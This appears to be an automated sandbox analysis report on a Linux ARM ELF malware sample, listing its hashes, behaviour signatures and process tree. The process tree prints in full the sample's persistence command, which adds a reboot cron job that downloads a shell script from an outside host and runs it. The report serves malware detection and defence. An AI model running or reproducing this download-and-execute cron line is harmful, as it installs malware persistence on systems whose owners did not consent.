Analysis

  • max time kernel
    149s
  • max time network
    140s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    27-10-2024 02:46

General

  • Target

    ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf

  • Size

    77KB

  • MD5

    5e6acfdb2b11d7a7d882bd937f763a79

  • SHA1

    3068bbeb0a17a20795406fc5b345fb6eb3a9fbc3

  • SHA256

    ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645

  • SHA512

    c84f873b1de729646afeed0bffe4d6ea919d01349f38e2e0190622ef7cf010a12cfd88c431ef2e023d2ac6549c9e9dbdededcc2cc37761e4eac4de37a592d739

  • SSDEEP

    1536:SKV6w6WzfWjQ0tDH28OB62JFhSJdPRW7CV/v7:SKV6ezf30tDW9B62byx7

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Changes its process name 1 IoCs
  • Reads runtime system information 47 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf
    /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:655
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:656
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:658
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:660

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /var/spool/cron/crontabs/tmp.wNhaz5

    Filesize

    306B

    MD5

    a7092eb6aa79161f5a3758d751aae1b3

    SHA1

    0f3e2f380e53ee3e3c412b75715939031fa40b04

    SHA256

    f6cd9800f1a8a1025b04977d62bcaf5f0d4642f8822ea73db53b5d986d576ac4

    SHA512

    02ea889ecb85f5ee111b8c7cc9937423214e809d1edbe85cedb8984e9dbc0a2c49561ca9159d468216bb27617211d74b80f2aefab34b2199b7e007eb7b487ba0